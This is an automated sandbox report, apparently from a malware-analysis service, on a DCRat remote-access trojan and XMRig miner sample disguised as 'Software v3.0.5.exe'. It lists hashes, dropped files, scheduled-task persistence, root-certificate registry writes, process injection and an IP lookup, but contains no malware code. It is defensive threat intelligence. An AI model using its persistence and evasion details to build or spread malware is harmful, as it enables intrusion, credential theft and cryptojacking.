dcrat | c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e

Analysis

max time kernel
142s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
22-07-2021 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software v3.0.5.exe
Size

910KB
MD5

56d73f0b8c89094a9f0ad6277f042b3d
SHA1

6efe8b8257f030fdb63a069aad558b6282310a31
SHA256

c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512

6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379

Score

10^/10

dcrat xmrig infostealer miner rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat Payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\MSOCache\All Users\dwm.exe	dcrat
C:\MSOCache\All Users\dwm.exe	dcrat

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/1492-152-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 9 IoCs

Processes:

Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.exedwm.exeservices64.exeservices32.exesihost64.exesihost32.exe

pid process

836 Dcr.exe
1228 etc.exe
1948 xmr.exe
576 fonthostSvcIntodhcp.exe
1520 dwm.exe
1796 services64.exe
1932 services32.exe
920 sihost64.exe
948 sihost32.exe
Loads dropped DLL 8 IoCs

Processes:

Software v3.0.5.execmd.exexmr.exeetc.exeservices64.exeservices32.exe

pid process

1100 Software v3.0.5.exe
1100 Software v3.0.5.exe
1100 Software v3.0.5.exe
340 cmd.exe
1948 xmr.exe
1228 etc.exe
1796 services64.exe
1932 services32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ipinfo.io
8 ipinfo.io

pid	process
836	Dcr.exe
1228	etc.exe
1948	xmr.exe
576	fonthostSvcIntodhcp.exe
1520	dwm.exe
1796	services64.exe
1932	services32.exe
920	sihost64.exe
948	sihost32.exe

pid	process
1100	Software v3.0.5.exe
1100	Software v3.0.5.exe
1100	Software v3.0.5.exe
340	cmd.exe
1948	xmr.exe
1228	etc.exe
1796	services64.exe
1932	services32.exe

flow	ioc
7	ipinfo.io
8	ipinfo.io

Drops file in System32 directory 7 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\SysWOW64\KBDROST\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\C_866\taskhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\C_866\b75386f1303e64d8139363b71e44ac16341adf4e	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\nci\WMIADAP.exe	fonthostSvcIntodhcp.exe
File opened for modification	C:\Windows\System32\wbem\nci\WMIADAP.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\nci\75a57c1bdf437c0c81ad56e81f43c7323ed35745	fonthostSvcIntodhcp.exe
File created	C:\Windows\SysWOW64\KBDROST\cmd.exe	fonthostSvcIntodhcp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 1796 set thread context of 1492 1796 services64.exe explorer.exe

description	pid	process	target process
PID 1796 set thread context of 1492	1796	services64.exe	explorer.exe

Drops file in Windows directory 2 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	fonthostSvcIntodhcp.exe
File created	C:\Windows\twain_32\explorer.exe	fonthostSvcIntodhcp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1940	schtasks.exe
1568	schtasks.exe
1456	schtasks.exe
1804	schtasks.exe
1712	schtasks.exe
512	schtasks.exe
1424	schtasks.exe
1768	schtasks.exe
1092	schtasks.exe
1580	schtasks.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

services32.exeservices64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	services32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	services32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

fonthostSvcIntodhcp.exedwm.exexmr.exeetc.exeservices64.exeservices32.exe

pid process

576 fonthostSvcIntodhcp.exe
1520 dwm.exe
1520 dwm.exe
1948 xmr.exe
1228 etc.exe
1796 services64.exe
1932 services32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dwm.exe

pid process

1520 dwm.exe

pid	process
576	fonthostSvcIntodhcp.exe
1520	dwm.exe
1520	dwm.exe
1948	xmr.exe
1228	etc.exe
1796	services64.exe
1932	services32.exe

pid	process
1520	dwm.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

fonthostSvcIntodhcp.exedwm.exexmr.exeetc.exeservices64.exeservices32.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	576	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	1520	dwm.exe
Token: SeDebugPrivilege	1948	xmr.exe
Token: SeDebugPrivilege	1228	etc.exe
Token: SeDebugPrivilege	1796	services64.exe
Token: SeDebugPrivilege	1932	services32.exe
Token: SeLockMemoryPrivilege	1492	explorer.exe
Token: SeLockMemoryPrivilege	1492	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exexmr.exeetc.execmd.execmd.exeservices32.exe

description	pid	process	target process
PID 1100 wrote to memory of 836	1100	Software v3.0.5.exe	Dcr.exe
PID 1100 wrote to memory of 836	1100	Software v3.0.5.exe	Dcr.exe
PID 1100 wrote to memory of 836	1100	Software v3.0.5.exe	Dcr.exe
PID 1100 wrote to memory of 836	1100	Software v3.0.5.exe	Dcr.exe
PID 1100 wrote to memory of 1228	1100	Software v3.0.5.exe	etc.exe
PID 1100 wrote to memory of 1228	1100	Software v3.0.5.exe	etc.exe
PID 1100 wrote to memory of 1228	1100	Software v3.0.5.exe	etc.exe
PID 1100 wrote to memory of 1228	1100	Software v3.0.5.exe	etc.exe
PID 1100 wrote to memory of 1948	1100	Software v3.0.5.exe	xmr.exe
PID 1100 wrote to memory of 1948	1100	Software v3.0.5.exe	xmr.exe
PID 1100 wrote to memory of 1948	1100	Software v3.0.5.exe	xmr.exe
PID 1100 wrote to memory of 1948	1100	Software v3.0.5.exe	xmr.exe
PID 836 wrote to memory of 1684	836	Dcr.exe	WScript.exe
PID 836 wrote to memory of 1684	836	Dcr.exe	WScript.exe
PID 836 wrote to memory of 1684	836	Dcr.exe	WScript.exe
PID 836 wrote to memory of 1684	836	Dcr.exe	WScript.exe
PID 1684 wrote to memory of 340	1684	WScript.exe	cmd.exe
PID 1684 wrote to memory of 340	1684	WScript.exe	cmd.exe
PID 1684 wrote to memory of 340	1684	WScript.exe	cmd.exe
PID 1684 wrote to memory of 340	1684	WScript.exe	cmd.exe
PID 340 wrote to memory of 576	340	cmd.exe	fonthostSvcIntodhcp.exe
PID 340 wrote to memory of 576	340	cmd.exe	fonthostSvcIntodhcp.exe
PID 340 wrote to memory of 576	340	cmd.exe	fonthostSvcIntodhcp.exe
PID 340 wrote to memory of 576	340	cmd.exe	fonthostSvcIntodhcp.exe
PID 576 wrote to memory of 1768	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1768	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1768	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1092	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1092	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1092	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1940	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1940	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1940	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1580	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1580	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1580	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1804	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1804	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1804	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1568	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1568	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1568	576	fonthostSvcIntodhcp.exe	schtasks.exe
PID 576 wrote to memory of 1520	576	fonthostSvcIntodhcp.exe	dwm.exe
PID 576 wrote to memory of 1520	576	fonthostSvcIntodhcp.exe	dwm.exe
PID 576 wrote to memory of 1520	576	fonthostSvcIntodhcp.exe	dwm.exe
PID 1948 wrote to memory of 1844	1948	xmr.exe	cmd.exe
PID 1948 wrote to memory of 1844	1948	xmr.exe	cmd.exe
PID 1948 wrote to memory of 1844	1948	xmr.exe	cmd.exe
PID 1228 wrote to memory of 1836	1228	etc.exe	cmd.exe
PID 1228 wrote to memory of 1836	1228	etc.exe	cmd.exe
PID 1228 wrote to memory of 1836	1228	etc.exe	cmd.exe
PID 1844 wrote to memory of 1712	1844	cmd.exe	schtasks.exe
PID 1844 wrote to memory of 1712	1844	cmd.exe	schtasks.exe
PID 1844 wrote to memory of 1712	1844	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1456	1836	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1456	1836	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1456	1836	cmd.exe	schtasks.exe
PID 1948 wrote to memory of 1796	1948	xmr.exe	services64.exe
PID 1948 wrote to memory of 1796	1948	xmr.exe	services64.exe
PID 1948 wrote to memory of 1796	1948	xmr.exe	services64.exe
PID 1228 wrote to memory of 1932	1228	etc.exe	services32.exe
PID 1228 wrote to memory of 1932	1228	etc.exe	services32.exe
PID 1228 wrote to memory of 1932	1228	etc.exe	services32.exe
PID 1932 wrote to memory of 1836	1932	services32.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100

C:\Users\Admin\AppData\Roaming\Dcr.exe
C:\Users\Admin\AppData\Roaming\Dcr.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\SysWOW64\WScript.exe
